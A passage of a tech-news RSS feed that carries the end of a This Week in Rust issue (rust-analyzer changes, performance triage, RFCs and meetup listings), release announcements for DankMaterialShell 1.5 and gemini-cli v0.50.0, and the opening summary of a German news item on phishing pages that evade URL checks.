<li><a href="https://github.com/rust-lang/rust-clippy/pull/17354">rewrite <code>tuple_array_conversions</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-analyzer">Rust-Analyzer</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22595">SCIP: exclude leading/trailing trivia in definition ranges</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22708">SCIP: remove dead <code>inlay_hints</code> field</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22433"><code>feat(ide-diagnostics)</code>: add diagnostics for invalid union patterns (E0784)</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22704"><code>internal(query-group-macro)</code>: remove the arity test</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22668">add tree top method to Syntax node</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22665">add handler for E0627</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22231">supports multi arms for <code>replace_match_with_if_let</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22690">fix UB in <code>smol_str borsh_non_utf8</code> test cases</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/20362">fix generic param for <code>generate_default_from_enum_variant</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22703"><code>walkthrough_create_project</code> file not packaged</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22677">assertion failure on closure with unbound function</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22613">avoid panic in <code>convert_tuple_struct_to_named_struct</code> on nested pattern usage</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22649">configuration syntax for nvim-lsp</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22706">correct resolution to value when it shares the same name with type</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22619">exclude impls on the error type from impl enumeration</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22705">fix crash on <code>extract_variable</code> when selecting unresolved macro call</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22715">fix crash on completion inside macros</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22673">fix handling of params of coroutine fns</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22675">handle more cases of cfgs in expr store lowering</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22488">no generate with default assoc item</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22674">panics in <code>unwrap_return_type</code>, <code>remove_underscore</code>, and <code>promote_local_to_const</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22711">hoist attribute qualifier segment collection</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22709">reduce parser joint-token allocation</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22676">project-model: don't pass metadata extra args to sysroot</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22679">project-model: introduce cargo.configPath</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22581">provide startup time to ready log point and associated benchmark</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-compiler-performance-triage">Rust Compiler Performance Triage</a></h5>
<p>This week was dominated by wild swings in benchmarks of the new-solver, which is not enabled by default, yet.
Apart from that, we got a very few notable changes, only one unexpected speedup from a bugfix in rustdoc.</p>
<p>Triage done by <strong>@panstromek</strong>.
Revision range: <a href="https://perf.rust-lang.org/?start=7dc2c162b9c197aaa76a6f9e7534569537830a01&amp;end=3659db0d3e2cd634c766fcda79ed118eca31a9fd&amp;absolute=false&amp;stat=instructions%3Au">7dc2c162..3659db0d</a></p>
<p><strong>Summary</strong>:</p>
<table>
<thead>
<tr>
<th>(instructions:u)</th>
<th>mean</th>
<th>range</th>
<th>count</th>
</tr>
</thead>
<tbody>
<tr>
<td>Regressions ❌ <br> (primary)</td>
<td>0.2%</td>
<td>[0.2%, 0.2%]</td>
<td>3</td>
</tr>
<tr>
<td>Regressions ❌ <br> (secondary)</td>
<td>162.1%</td>
<td>[0.2%, 1116.3%]</td>
<td>20</td>
</tr>
<tr>
<td>Improvements ✅ <br> (primary)</td>
<td>-1.4%</td>
<td>[-8.4%, -0.1%]</td>
<td>7</td>
</tr>
<tr>
<td>Improvements ✅ <br> (secondary)</td>
<td>-1.1%</td>
<td>[-8.4%, -0.1%]</td>
<td>11</td>
</tr>
<tr>
<td>All ❌✅ (primary)</td>
<td>-0.9%</td>
<td>[-8.4%, 0.2%]</td>
<td>10</td>
</tr>
</tbody>
</table>
<p>1 Regression, 1 Improvement, 4 Mixed; 3 of them in rollups
17 artifact comparisons made in total</p>
<p><a href="https://github.com/rust-lang/rustc-perf/blob/9f1bc6e374b5ae202366df1cbef850b79be8c641/triage/2026/2026-07-06.md">Full report here</a></p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#approved-rfcs"></a><a href="https://github.com/rust-lang/rfcs/commits/master">Approved RFCs</a></h5>
<p>Changes to Rust follow the Rust <a href="https://github.com/rust-lang/rfcs#rust-rfcs">RFC (request for comments) process</a>. These
are the RFCs that were approved for implementation this week:</p>
<ul>
<li><em>No RFCs were approved this week.</em></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#final-comment-period">Final Comment Period</a></h5>
<p>Every week, <a href="https://www.rust-lang.org/team.html">the team</a> announces the 'final comment period' for RFCs and key PRs
which are reaching a decision. Express your opinions now.</p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#tracking-issues-prs">Tracking Issues &amp; PRs</a></h6>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust"></a><a href="https://github.com/rust-lang/rust/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Rust</a>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158522">Lint against invalid POSIX symbol definitions</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158325">Document NonNull layout guarantees</a></li>
<li><a href="https://github.com/rust-lang/rust/issues/112811">Tracking Issue for <code>slice_split_once</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler-team-mcps-only"></a><a href="https://github.com/rust-lang/compiler-team/issues?q=label%3Amajor-change%20label%3Afinal-comment-period%20state%3Aopen">Compiler Team</a> <a href="https://forge.rust-lang.org/compiler/mcp.html">(MCPs only)</a>
<ul>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1011">Let the OS handle stack growth</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1010">Add <code>target_feature_available_at_call_site</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#language-reference"></a><a href="https://github.com/rust-lang/reference/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Reference</a>
<ul>
<li><a href="https://github.com/rust-lang/reference/pull/2293">Empty repr(Rust) enums are ZSTs</a></li>
</ul>
<p><em>No Items entered Final Comment Period this week for
<a href="https://github.com/rust-lang/cargo/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/lang-team/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Team</a>,
<a href="https://github.com/rust-lang/leadership-council/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Leadership Council</a>,
<a href="https://github.com/rust-lang/rfcs/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Rust RFCs</a> or
<a href="https://github.com/rust-lang/unsafe-code-guidelines/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Unsafe Code Guidelines</a>.</em></p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#new-and-updated-rfcs"></a><a href="https://github.com/rust-lang/rfcs/pulls">New and Updated RFCs</a></h5>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3982">Update RFC template</a></li>
<li><a href="https://github.com/rust-lang/rfcs/pull/3981">RFC: Store registry tokens in the OS credential store by default</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#upcoming-events">Upcoming Events</a></h4>
<p>Rusty Events between 2026-07-08 - 2026-08-05 🦀</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#virtual">Virtual</a></h5>
<ul>
<li>2026-07-08 | Virtual (Cardiff, GB) | <a href="https://www.meetup.com/rust-and-c-plus-plus-in-cardiff/events/">Rust and C++ Cardiff</a></li>
<li><a href="https://www.meetup.com/rust-and-c-plus-plus-in-cardiff/events/315506435/"><strong>Operating Systems Book Club: Introduction + Processes</strong></a></li>
<li>2026-07-08 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/jv9lom12"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-07-09 | Virtual (Nürnberg, DE) | <a href="https://www.meetup.com/rust-noris/events/">Rust Nuremberg</a></li>
<li><a href="https://www.meetup.com/rust-noris/events/315517604/"><strong>Rust Nürnberg online</strong></a></li>
<li>2026-07-14 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a></li>
<li><a href="https://www.meetup.com/dallasrust/events/310254778/"><strong>Second Tuesday</strong></a></li>
<li>2026-07-15 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/21k797xr"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a></li>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a></li>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
<li>2026-07-16 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a></li>
<li><a href="https://www.meetup.com/rust-berlin/events/312045926/"><strong>Rust Hack and Learn</strong></a></li>
<li>2026-07-19 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a></li>
<li><a href="https://www.meetup.com/dallasrust/events/314329045/"><strong>Rust Deep Learning: Third Sunday</strong></a></li>
<li>2026-07-21 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a></li>
<li><a href="https://www.meetup.com/women-in-rust/events/315102297/"><strong>Lunch &amp; Learn: Learning Rust as First Programming Language</strong></a></li>
<li>2026-07-21 | Virtual (Washington, DC, US) | <a href="https://www.meetup.com/rustdc">Rust DC</a></li>
<li><a href="https://www.meetup.com/rustdc/events/315279653/"><strong>Mid-month Rustful</strong></a></li>
<li>2026-07-22 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/hd8mlw56"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-07-28 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a></li>
<li><a href="https://www.meetup.com/dallasrust/events/310254777/"><strong>Fourth Tuesday</strong></a></li>
<li>2026-07-29 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/uo5ek1f4"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-07-30 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin/events/">Rust Berlin</a></li>
<li><a href="https://www.meetup.com/rust-berlin/events/312045928/"><strong>Rust Hack and Learn</strong></a></li>
<li>2026-08-02 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust/events/">Dallas Rust User Meetup</a></li>
<li><a href="https://www.meetup.com/dallasrust/events/314095294/"><strong>Rust Deep Learning: First Sunday</strong></a></li>
<li>2026-08-04 | Virtual (London, GB) | <a href="https://www.meetup.com/women-in-rust/events/">Women in Rust</a></li>
<li><a href="https://www.meetup.com/women-in-rust/events/315213885/"><strong>👋 Community Catch Up</strong></a></li>
<li>2026-07-29 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/ii2jrwva"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-08-05 | Virtual (Indianapolis, IN, US) | <a href="https://www.meetup.com/indyrs/events/">Indy Rust</a></li>
<li><a href="https://www.meetup.com/indyrs/events/315210367/"><strong>Indy.rs - with Social Distancing</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#asia">Asia</a></h5>
<ul>
<li>2026-07-18 | Bangalore, IN | <a href="https://hasgeek.com/rustbangalore">Rust Bangalore</a></li>
<li><a href="https://hasgeek.com/rustbangalore/july-2026-rustacean-meetup/"><strong>July 2026 Rustacean Meetup</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#africa">Africa:</a></h5>
<ul>
<li>2026-07-14 | Johannesburg, ZA | <a href="https://www.meetup.com/johannesburg-rust-meetup/events/">Johannesburg Rust Meetup</a></li>
<li><a href="https://www.meetup.com/johannesburg-rust-meetup/events/315573758/"><strong>Debugging a production grade Open Source Rust crate</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#europe">Europe</a></h5>
<ul>
<li>2026-07-08 | Dublin, IE | <a href="https://www.meetup.com/rust-dublin">Rust Dublin</a></li>
<li><a href="https://www.meetup.com/rust-dublin/events/315150327/"><strong>Join us live and INPERSON for Rust 262</strong></a></li>
<li>2026-07-09 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin/events/">Rust Berlin</a></li>
<li><a href="https://www.meetup.com/rust-berlin/events/315585121/"><strong>Rust Berlin on location 🏳️‍🌈 - Edition 015</strong></a></li>
<li>2026-07-09 | Frankfurt, DE | <a href="https://www.meetup.com/rust-rhein-main/events/">Rust Rhein-Main</a></li>
<li><a href="https://www.meetup.com/rust-rhein-main/events/315366165/"><strong>Building Cross Platform Applications with Ply</strong></a></li>
<li>2026-07-09 | Switzerland, CH | <a href="https://www.posttenebraslab.ch/wiki/events/start">PostTenebrasLab</a></li>
<li><a href="https://www.posttenebraslab.ch/wiki/events/monthly_meeting/rust_meetup"><strong>Rust Meetup Geneva</strong></a></li>
<li>2026-07-15 | Dortmund, DE | <a href="https://www.meetup.com/rust-dortmund/events/">Rust Dortmund</a></li>
<li><a href="https://www.meetup.com/rust-dortmund/events/315496876/"><strong>Teach and Hack at Projektspeicher</strong></a></li>
<li>2026-07-21 | Leipzig, DE | <a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig">Rust - Modern Systems Programming in Leipzig</a></li>
<li><a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig/events/313816470/"><strong>Supercharge Rust funcs with implicit arguments and context-generic programming</strong></a></li>
<li>2026-07-23 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a></li>
<li><a href="https://www.meetup.com/rust-berlin/events/315484101/"><strong>Rust Berlin Talks: The next generation</strong></a></li>
<li>2026-07-23 | London, UK | <a href="https://www.meetup.com/london-rust-project-group">London Rust Project Group</a></li>
<li><a href="https://www.meetup.com/london-rust-project-group/events/315366453/"><strong>Rama modular service framework for Rust</strong></a></li>
<li>2026-07-23 | Paris, FR | <a href="https://www.meetup.com/rust-paris">Rust Paris</a></li>
<li><a href="https://www.meetup.com/rust-paris/events/315309633/"><strong>Rust meetup #87</strong></a></li>
<li>2026-07-30 | Manchester, GB | <a href="https://www.meetup.com/rust-manchester/events/">Rust Manchester</a></li>
<li><a href="https://www.meetup.com/rust-manchester/events/315037685/"><strong>Rust Manchester July Code Night</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#north-america">North America</a></h5>
<ul>
<li>2026-07-09 | Lehi, UT, US | <a href="https://www.meetup.com/utah-rust">Utah Rust</a></li>
<li><a href="https://www.meetup.com/utah-rust/events/314696647/"><strong>Utah Rust July Meetup</strong></a></li>
<li>2026-07-09 | Mountain View, CA, US | <a href="https://www.meetup.com/hackerdojo/events/">Hacker Dojo</a></li>
<li><a href="https://www.meetup.com/hackerdojo/events/315338107/"><strong>RUST MEETUP at HACKER DOJO</strong></a></li>
<li>2026-07-11 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/315225865/"><strong>MIT Rust Lunch, July 11</strong></a></li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a></li>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a></li>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
<li>2026-07-18 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/315225872/"><strong>North End Rust Lunch, July 18</strong></a></li>
<li>2026-07-21 | San Francisco, CA, US | <a href="https://www.meetup.com/san-francisco-rust-study-group">San Francisco Rust Study Group</a></li>
<li><a href="https://www.meetup.com/san-francisco-rust-study-group/events/314997214/"><strong>Rust Hacking in Person</strong></a></li>
<li>2026-07-22 | Austin, TX, US | <a href="https://www.meetup.com/rust-atx">Rust ATX</a></li>
<li><a href="https://www.meetup.com/rust-atx/events/xvkdgtyjckbdc/"><strong>Rust Lunch - Fareground</strong></a></li>
<li>2026-07-22 | Los Angeles, CA, US | <a href="https://www.meetup.com/rust-los-angeles">Rust Los Angeles</a></li>
<li><a href="https://www.meetup.com/rust-los-angeles/events/315376271/"><strong>Rust LA: Rust in Distributed Systems with Flight Science!</strong></a></li>
<li>2026-07-25 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/315582650/"><strong>Porter Square Rust Lunch, July 25</strong></a></li>
<li>2026-07-25 | Brooklyn, NY, US | <a href="https://flowercomputer.com/">Flower</a></li>
<li><a href="https://partiful.com/e/Vq9fyDNCMSO7ia4ulK5b"><strong>BOG-A-THON 2</strong></a></li>
<li>2026-07-30 | Atlanta, GA, US | <a href="https://www.meetup.com/rust-atl/events/">Rust Atlanta</a></li>
<li><a href="https://www.meetup.com/rust-atl/events/313539329/"><strong>Rust-Atl</strong></a></li>
<li>2026-08-01 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/315582653/"><strong>Chinatown Rust Lunch, Aug 1</strong></a></li>
<li>2026-08-04 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/314660176/"><strong>Evening Boston Rust Meetup at Red Hat, Aug 4</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#oceania">Oceania</a></h5>
<ul>
<li>2026-07-09 | Brisbane City, QL, AU | <a href="https://www.meetup.com/rust-brisbane/events/">Rust Brisbane</a></li>
<li><a href="https://www.meetup.com/rust-brisbane/events/315563251/"><strong>Rust Brisbane • July 2026</strong></a></li>
<li>2026-07-21 | Barton, AU | <a href="https://www.meetup.com/rust-canberra">Canberra Rust User Group</a></li>
<li><a href="https://www.meetup.com/rust-canberra/events/315307280/"><strong>July Meetup</strong></a></li>
<li>2026-07-23 | Perth, AU | <a href="https://www.meetup.com/perth-rust-meetup-group">Rust Perth Meetup Group</a></li>
<li><a href="https://www.meetup.com/perth-rust-meetup-group/events/315451138/"><strong>Rust Perth: July Meetup!</strong></a></li>
<li>2026-07-30 | Melbourne, AU | <a href="https://www.meetup.com/rust-melbourne/events/">Rust Melbourne</a></li>
<li><a href="https://www.meetup.com/rust-melbourne/events/315039480/"><strong>Rust Melbourne July 2026</strong></a></li>
</ul>
<p>If you are running a Rust event please add it to the <a href="https://www.google.com/calendar/embed?src=apd9vmbc22egenmtu5l6c5jbfc%40group.calendar.google.com">calendar</a> to get
it mentioned here. Please remember to add a link to the event too.
Email the <a href="mailto:community-team@rust-lang.org">Rust Community Team</a> for access.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#jobs">Jobs</a></h4>
<p>Please see the latest <a href="https://www.reddit.com/r/rust/comments/1ttbtf5/official_rrust_whos_hiring_thread_for_jobseekers/">Who's Hiring thread on r/rust</a></p>
<h3><a class="toclink" href="https://this-week-in-rust.org/atom.xml#quote-of-the-week">Quote of the Week</a></h3>
<blockquote>
<p>if a ptr is dereferenced in a forest and nobody hears it, is it sound?</p>
</blockquote>
<p>– <a href="https://users.rust-lang.org/t/does-the-indirection-of-a-pointer-immediately-create-a-reference/141071/10">Kornel on rust-users</a></p>
<p>Thanks to <a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328/1785">Cerber-Ursi</a> for the suggestion!</p>
<p><a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328">Please submit quotes and vote for next week!</a></p>
<p>This Week in Rust is edited by:</p>
<ul>
<li><a href="https://github.com/nellshamrell">nellshamrell</a></li>
<li><a href="https://github.com/llogiq">llogiq</a></li>
<li><a href="https://github.com/ericseppanen">ericseppanen</a></li>
<li><a href="https://github.com/extrawurst">extrawurst</a></li>
<li><a href="https://github.com/U007D">U007D</a></li>
<li><a href="https://github.com/mariannegoldin">mariannegoldin</a></li>
<li><a href="https://github.com/bdillo">bdillo</a></li>
<li><a href="https://github.com/opeolluwa">opeolluwa</a></li>
<li><a href="https://github.com/bnchi">bnchi</a></li>
<li><a href="https://github.com/KannanPalani57">KannanPalani57</a></li>
<li><a href="https://github.com/tzilist">tzilist</a></li>
</ul>
<p><em>Email list hosting is sponsored by <a href="https://foundation.rust-lang.org/">The Rust Foundation</a></em></p>
<p><small><a href="https://www.reddit.com/r/rust/comments/1ureq0r/this_week_in_rust_659/">Discuss on r/rust</a></small></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[DankMaterialShell (DMS) 1.5 "The Wolverine" Released - A Linux shell for Wayland Compositors]]></title>
<description><![CDATA[DMS v1.5 has officially been released. This is the largest DMS release to date and packs numerous new features, performance improvements, and broad changes/enhancements to the overall ecosystem. Highlights:  Frame and Connected Mode - An alternative UI for DMS that gives the option to connect all...]]></description>
<link>https://tsecurity.de/de/3655741/linux-tipps/dankmaterialshell-dms-15-the-wolverine-released-a-linux-shell-for-wayland-compositors/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655741/linux-tipps/dankmaterialshell-dms-15-the-wolverine-released-a-linux-shell-for-wayland-compositors/</guid>
<pubDate>Thu, 09 Jul 2026 03:54:28 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>DMS v1.5 has officially been released. This is the largest DMS release to date and packs numerous new features, performance improvements, and broad changes/enhancements to the overall ecosystem.</p> <p>Highlights:</p> <ul> <li><strong>Frame and Connected Mode</strong> - An alternative UI for DMS that gives the option to connect all layer-shell surfaces as a single unified-view. Brings with it more animation and theme options to customize the experience</li> <li><strong>Dank Calendar</strong> - A standalone app that supports events (VEVENT in CalDav), tasks (VTODO in CalDav) with numerous providers - Google, iCloud, Microsoft, Caldav, iCal stream, and Evolution Data Server, is integrated with DMS 1.5 widgets natively when it is running and available</li> <li><strong>Window Rules</strong> - Expanded significantly and support brought to Hyprland and MangoWM</li> <li><strong>New Shadow System</strong> - New shader-based shadow system replaces the CPU-heavy FBO shadows and brings numerous new options for configuration</li> <li><strong>XDG-Autostart Management</strong> - Manage desktop apps that autostart with your session. DMS is not launching these apps, it still depends on a session runner such as systemd or dex. But adding/managing these applications is now integrated</li> <li><strong>Default Applications</strong> - Manage default applications for various mime-types, as well as an enhanced DMS picker (for example, a menu that opens and allows you to choose Firefox, Chrome, Brave for opening links)</li> <li><strong>Plugin Ecosystem Enhancements</strong> - A forum, upvote system, and moderation system has been implemented for the DMS plugin registry which should aid greatly with finding high quality plugins, filtering plugins, and reporting issues with plugins.</li> <li><strong>Hyprland Lua Configuration</strong> - is now supported and all configurations managed by DMS are now written in the Lua format</li> <li><strong>MangoWM Support Enhanced</strong> - Better support for MangoWM - including default configuration options, window rule management, and using the new IPC interface instead of dwl-ipc protocol.</li> </ul> <p>There's a lot more than that, see the blog for the full details. Some distribution packages will trail behind the official release as maintainers need time to update their packages.</p> <p>Thanks to all the contributors and enjoy!</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/bbedward"> /u/bbedward </a> <br> <span><a href="https://danklinux.com/blog/v1-5-release">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1ur2ttk/dankmaterialshell_dms_15_the_wolverine_released_a/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Release v0.50.0]]></title>
<description><![CDATA[What's Changed

fix/verify release npm ci ignore scripts by @rmedranollamas in #28116
fix(ci): prevent workspace binary shadowing in release verification by @galdawave in #28132
Feat/tool registry discovery by @ved015 in #28113
fix(ci): prevent bad NPM releases and promote job crashes by @galdawa...]]></description>
<link>https://tsecurity.de/de/3655225/downloads/release-v0500/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655225/downloads/release-v0500/</guid>
<pubDate>Wed, 08 Jul 2026 20:45:48 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>fix/verify release npm ci ignore scripts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rmedranollamas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rmedranollamas">@rmedranollamas</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4731380905" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28116" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28116/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28116">#28116</a></li>
<li>fix(ci): prevent workspace binary shadowing in release verification by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galdawave/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galdawave">@galdawave</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4738727594" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28132" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28132/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28132">#28132</a></li>
<li>Feat/tool registry discovery by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ved015/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ved015">@ved015</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4728648296" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28113" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28113/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28113">#28113</a></li>
<li>fix(ci): prevent bad NPM releases and promote job crashes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galdawave/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galdawave">@galdawave</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4746204393" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28147" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28147/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28147">#28147</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/google-gemini/gemini-cli/compare/v0.49.0...v0.50.0"><tt>v0.49.0...v0.50.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ghost Phishing: Warum verschlüsselte Webseiten URL-Checks umgehen und Microsoft 365 gefährden]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Eine neue Ghost-Phishing-Welle verschleiert bösartige Inhalte so lange, bis die Seite im Browser entschlüsselt und im DOM sichtbar wird. Das macht klassische URL-Checks und Netzwerkregeln in der Praxis blind, obwohl der erste HTTP-Response für Prüfmechanismen „harmlos“ wirk...]]></description>
<link>https://tsecurity.de/de/3654973/it-security-nachrichten/ghost-phishing-warum-verschluesselte-webseiten-url-checks-umgehen-und-microsoft-365-gefaehrden/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654973/it-security-nachrichten/ghost-phishing-warum-verschluesselte-webseiten-url-checks-umgehen-und-microsoft-365-gefaehrden/</guid>
<pubDate>Wed, 08 Jul 2026 19:23:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
